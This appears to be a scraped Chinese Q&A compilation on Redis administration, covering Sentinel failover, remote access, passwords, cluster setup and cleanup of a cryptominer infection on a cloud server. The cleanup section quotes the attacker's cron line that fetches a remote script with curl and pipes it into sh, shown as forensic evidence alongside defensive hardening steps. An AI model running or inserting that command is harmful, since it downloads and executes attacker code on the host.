修改redis伺服器器ip
Ⅰ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
Ⅱ redis-cli 如何重寫伺服器的主機名和埠
redis-cli.exe -h IP -p 6379, 這個要在redis-cli.exe 所在目錄下面,-h後面接redis伺服器的IP地址,-p後面接埠, 一般沒做過修改redis.conf情況下埠是6379
Ⅲ Redis哨兵(Sentinel)模式
主從切換技術的方法是:當主伺服器宕機後,需要手動把一台從伺服器切換為主伺服器,這就需要人工干預,費事費力,還會造成一段時間內服務不可用。 這不是一種推薦的方式,更多時候,我們優先考慮 哨兵模式 。
一、哨兵模式概述
哨兵模式是一種特殊的模式,首先Redis提供了哨兵的命令,哨兵是一個獨立的進程,作為進程,它會獨立運行。其原理是 哨兵通過發送命令,等待Redis伺服器響應,從而監控運行的多個Redis實例。
Redis哨兵
這里的哨兵有兩個作用
通過發送命令,讓Redis伺服器返回監控其運行狀態,包括主伺服器和從伺服器。
當哨兵監測到master宕機,會自動將slave切換成master,然後通過 發布訂閱模式 通知其他的從伺服器,修改配置文件,讓它們切換主機。
然而一個哨兵進程對Redis伺服器進行監控,可能會出現問題,為此,我們可以使用多個哨兵進行監控。各個哨兵之間還會進行監控,這樣就形成了多哨兵模式。
用文字描述一下 故障切換(failover) 的過程。假設主伺服器宕機,哨兵1先檢測到這個結果,系統並不會馬上進行failover過程,僅僅是哨兵1主觀的認為主伺服器不可用,這個現象成為 主觀下線 。當後面的哨兵也檢測到主伺服器不可用,並且數量達到一定值時,那麼哨兵之間就會進行一次投票,投票的結果由一個哨兵發起,進行failover操作。切換成功後,就會通過發布訂閱模式,讓各個哨兵把自己監控的從伺服器實現切換主機,這個過程稱為 客觀下線 。這樣對於客戶端而言,一切都是透明的。
二、Redis配置哨兵模式
配置3個哨兵和1主2從的Redis伺服器來演示這個過程。
服務類型是否是主伺服器IP地址埠
Redis是192.168.11.1286379
Redis否192.168.11.1296379
Redis否192.168.11.1306379
Sentinel-192.168.11.12826379
Sentinel-192.168.11.12926379
Sentinel-192.168.11.13026379
多哨兵監控Redis
首先配置Redis的主從伺服器,修改redis.conf文件如下
上述內容主要是配置Redis伺服器,從伺服器比主伺服器多一個slaveof的配置和密碼。
配置3個哨兵,每個哨兵的配置都是一樣的。在Redis安裝目錄下有一個sentinel.conf文件,一份進行修改
上述關閉了保護模式,便於測試。
有了上述的修改,我們可以進入Redis的安裝目錄的src目錄,通過下面的命令啟動伺服器和哨兵
注意啟動的順序。 首先是主機(192.168.11.128)的Redis服務進程,然後啟動從機的服務進程,最後啟動3個哨兵的服務進程。
三、Java中使用哨兵模式
上面是通過Jedis進行使用的,同樣也可以使用Spring進行配置RedisTemplate使用。
四、哨兵模式的其他配置項
sentinel down-after-milliseconds配置項只是一個哨兵在超過規定時間依舊沒有得到響應後,會自己認為主機不可用。對於其他哨兵而言,並不是這樣認為。哨兵會記錄這個消息,當擁有認為主觀下線的哨兵達到sentinel monitor所配置的數量時,就會發起一次投票,進行failover,此時哨兵會重寫Redis的哨兵配置文件,以適應新場景的需要。
Ⅳ window安裝redis外網無法訪問
下載安裝包並解壓;
redis window 伺服器安裝教程
2
解壓安裝包到自定義的文件夾後,打開dos窗口,切換至解壓後目錄。輸入指令redis-server redis.windos.conf 即可啟動redis服務。
redis window 伺服器安裝教程
3
為了測試伺服器是否啟動正常,雙擊解壓目錄下的redis客戶端,存放一個key值進行測試,如下圖存取即表示您的redis啟動成功啦。
redis window 伺服器安裝教程
redis window 伺服器安裝教程
END
讓redis支持遠程訪問
以上步驟,您已經完成了如何在伺服器本地使用redis。想要在本機訪問伺服器的redis服務,還需要修改redis.windows.conf文件的相關配置。將「bind 127.0.0.1」注釋,增加「bind 您的伺服器IP」;為了安全,開啟密碼認證:「requirepass 密碼」。
redis window 伺服器安裝教程
redis window 伺服器安裝教程
2
打開本機dos,調用redis-cli客戶端進行測試。輸入指令:redis-cli -h 伺服器IP -p 6379 -a 密碼
redis window 伺服器安裝教程
Ⅳ Redis怎麼取消認證密碼設置
1.比較安全的辦法是採用綁定IP的方式來進行控制。
請在redis.conf文件找到如下配置
# If you want you can bind a single interface, if the bind option is not
# specified all the interfaces will listen for incoming connections.
#
# bind 127.0.0.1
把# bind 127.0.0.1前面的 注釋#號去掉,然後把127.0.0.1改成你允許訪問你的redis伺服器的ip地址,表示只允許該ip進行訪問
這種情況下,我們在啟動redis伺服器的時候不能再用:redis-server,改為:redis-server path/redis.conf 即在啟動的時候指定需要載入的配置文件,其中path/是你上面修改的redis配置文件所在目錄,這個方法有一點不太好,我難免有多台機器訪問一個redis服務。
2.設置密碼,以提供遠程登陸
打開redis.conf配置文件,找到requirepass,然後修改如下:
requirepass yourpassword
yourpassword就是redis驗證密碼,設置密碼以後發現可以登陸,但是無法執行命令了。
命令如下:
redis-cli -h yourIp -p yourPort//啟動redis客戶端,並連接伺服器
keys * //輸出伺服器中的所有key
報錯如下
(error) ERR operation not permitted
這時候你可以用授權命令進行授權,就不報錯了
命令如下:
auth youpassword
另外,在連接伺服器的時候就可以指定登錄密碼,避免單獨輸入上面授權命令
命令如下:
redis-cli -h yourIp-p yourPort -a youPassword
除了在配置文件redis.conf中配置驗證密碼以外,也可以在已經啟動的redis伺服器通過命令行設置密碼,但這種方式是臨時的,當伺服器重啟了密碼必須重設。命令行設置密碼方式如下:
config set requirepass yourPassword
有時候我們不知道當前redis伺服器是否有設置驗證密碼,或者忘記了密碼是什麼,我們可以通過命令行輸入命令查看密碼,命令如下:
config get requirepass
如果redis服務端沒有配置密碼,會得到nil,而如果配置了密碼,但是redis客戶端連接redis服務端時,沒有用密碼登錄驗證,會提示:operation not permitted,這時候可以用命令:auth yourpassword 進行驗證密碼,再執行config set requirepass,就會顯示yourpassword
由於redis並發能力極強,僅僅搞密碼,攻擊者可能在短期內發送大量猜密碼的請求,很容易暴力破解,所以建議密碼越長越好,比如20位。(密碼在 conf文件里是明文,所以不用擔心自己會忘記)
Ⅵ redis域名怎麼解析成伺服器地址
redis域名首先我們打開電腦桌面並點擊左下角開始選項。
然後我們在彈出來的界面里找到並點擊運行選項然後此時電腦桌面上會彈出運行對話框,我們在運行對話框里輸入命令cmd並點擊確定點擊確定後系統會彈出彈出DOS窗口我們在dos窗口裡輸入命令nslookup+域名,再按enter鍵,系統就會對域名進行正向解析。
然後系統彈出來的代碼界面就會返回所需的IP地址。
Ⅶ 阿里雲redis 淪為肉雞怎麼辦
1 配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379. 防火牆控制好允許IP連接就好
2 配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
3 配置rename-command CONFIG"RENAME_CONFIG", 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
4是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如config
Ⅷ 遠程連接redis報錯:Connection refused
注釋掉 bind 127.0.0.1 這一行(在前面添加一個 # 就是注釋)。
重啟 redis 服務。
注意: redis 的配置文件位置不是100%一樣,有可能你的伺服器的 redis.config 文件和我的位置不一樣,請注意甄別。
如果還不行,檢查防火牆設置,看看是否有禁止 6379 埠或者限制遠程 ip 訪問。 如果是購買的雲伺服器 ,檢查 安全組 是否放行 6379 埠(例如:如果你購買的是阿里雲的伺服器,則登錄阿里雲的控制台,查看redis所在伺服器的安全組設置)。
將命令中的 88.88.88.88 改成你的 ip 地址,將 6379 改成你的 redis 的埠(默認埠就是 6379 ),將 password 改成你的 redis 授權密碼。
Ⅸ linux 怎麼改redis集群的ip地址
首先要有linux環境,然後下載redis3.0以上版本。redis結合使用ruby實現了集群,所以需要ruby環境,安裝ruby環境和redis的gem介面後,就可以使用redis的redis-trib.rb腳本創建集群。步驟:
1.修改配置文件,啟動多個redis實例。
2.安裝ruby、rubygems、redis ruby介面。
安裝gem 需要ruby的版本在 1.8.7 以上,默認的centos5 上都是1.8.5 版本,所以首先你的升級你的ruby
3.gem 安裝redis ruby 介面
4.redis-trib.rb腳本創建集群
Ⅹ 怎麼修改redis-cli訪問的地址
加上主機ip和要訪問的埠:
redis-cli -h 192.168.1.103 -p 6379
不加參數默認是localhost和6379